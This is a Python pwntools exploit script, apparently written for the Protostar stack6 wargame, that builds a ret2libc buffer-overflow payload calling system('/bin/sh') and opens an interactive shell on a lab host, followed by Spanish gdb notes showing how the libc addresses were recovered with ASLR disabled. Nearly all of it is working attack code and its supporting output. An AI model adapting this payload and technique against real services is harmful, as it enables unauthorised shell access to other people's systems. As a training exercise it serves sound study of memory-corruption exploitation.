import struct
import time

from pwn import *

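HOST = '192.168.32.143'
PORT = 1234

# Addresses recovered with gdb on the target (see the notes at the bottom).
# They are only stable because Protostar runs with ASLR disabled; on any other
# box libc's base moves per execution and these constants must be re-derived.
LIBC_BASE = 0xb7e97000        # start of the /lib/libc-2.11.2.so mapping (file offset 0)
SYSTEM_ADDR = 0xb7ecffb0      # (gdb) p system
BINSH_OFFSET = 1176511        # `strings -t d libc | grep /bin/sh` -> decimal file offset
RET_OFFSET = 80               # input bytes written before the saved return address
SAVED_EBP = b"DDDD"           # junk that lands in the saved frame pointer


def build_payload(ret_offset=RET_OFFSET, saved_ebp=SAVED_EBP,
                  system_addr=SYSTEM_ADDR, binsh_addr=LIBC_BASE + BINSH_OFFSET,
                  fake_ret=b"AAAA"):
    """Return the ret2libc payload as bytes.

    Layout, low to high address:
        [padding][saved ebp][system][return address after system][ptr to "/bin/sh"]

    Overwriting the saved return address with system() makes the function's
    `ret` behave like `call system`: the word right after it is where system()
    will return to (junk here, so the process crashes once the shell exits --
    acceptable for a PoC) and the word after that is system()'s first
    argument, a pointer to the "/bin/sh" string that ships inside libc.

    Everything is built as bytes so the script works with both Python 2 and
    Python 3 pwntools (mixing str and the bytes returned by p32() breaks on 3).

    Raises:
        ValueError: if ret_offset is smaller than the fake frame pointer.
    """
    if ret_offset < len(saved_ebp):
        raise ValueError("ret_offset must be >= len(saved_ebp)")
    # The 0x90 bytes are never executed (we return into libc, not the stack);
    # they are just filler up to the saved frame pointer.
    padding = b"\x90" * (ret_offset - len(saved_ebp))
    # struct.pack("<I", x) is the same 32-bit little-endian word as pwntools p32(x).
    return (padding + saved_ebp
            + struct.pack("<I", system_addr)
            + fake_ret
            + struct.pack("<I", binsh_addr))


def main():
    """Connect to the target, deliver the payload and hand the shell to the user."""
    p = remote(HOST, PORT)
    payload = build_payload()
    # Give the service time to print its prompt before answering. Syncing on
    # the prompt text with p.recvuntil() would be more reliable than a fixed
    # sleep if the exact prompt is known.
    time.sleep(2)
    p.sendline(payload)
    p.interactive()


if __name__ == "__main__":
    main()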


'''  --------------------------------------
     |         STACK #call system         |
     |	......                            |
     |	RET #AAAA                         |
     |	0xb7e97000+1176511 (/bin/sh) arg  |
     --------------------------------------

		PoC
0. No podemos saltar a shellcode en la pila: el binario comprueba la direccion de retorno y rechaza las que apuntan a la pila (0xbf......, ver [stack] abajo). Por eso hacemos ret2libc: la direccion de system() esta en libc (0xb7......) y pasa el filtro.
1. Obtenemos la libreria system:
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>

2. Vemos donde comienza la libc:
(gdb) info proc mappings
process 2306
cmdline = '/tmp/stack6'
cwd = '/tmp'
exe = '/tmp/stack6'
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000          0        /tmp/stack6
	 0x8049000  0x804a000     0x1000          0        /tmp/stack6
	0xb7e96000 0xb7e97000     0x1000          0        
	0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
	0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
	0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
	0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
	0xb7fd9000 0xb7fdc000     0x3000          0        
	0xb7fe0000 0xb7fe2000     0x2000          0        
	0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
	0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
	0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
	0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
	0xbffeb000 0xc0000000    0x15000          0           [stack]

3. Localizamos donde esta /bin/sh para poder pasarle como argumento
user@protostar:/tmp$ strings -t d /lib/libc-2.11.2.so | grep /bin/sh
1176511 /bin/sh

4. Con system() y la cadena "/bin/sh" ya presentes en libc no hace falta shellcode propio. Ojo: estas direcciones solo son validas porque Protostar corre sin ASLR; con ASLR activo habria que filtrar (leak) la base de libc en cada ejecucion y recalcular system y /bin/sh a partir de ella.
'''
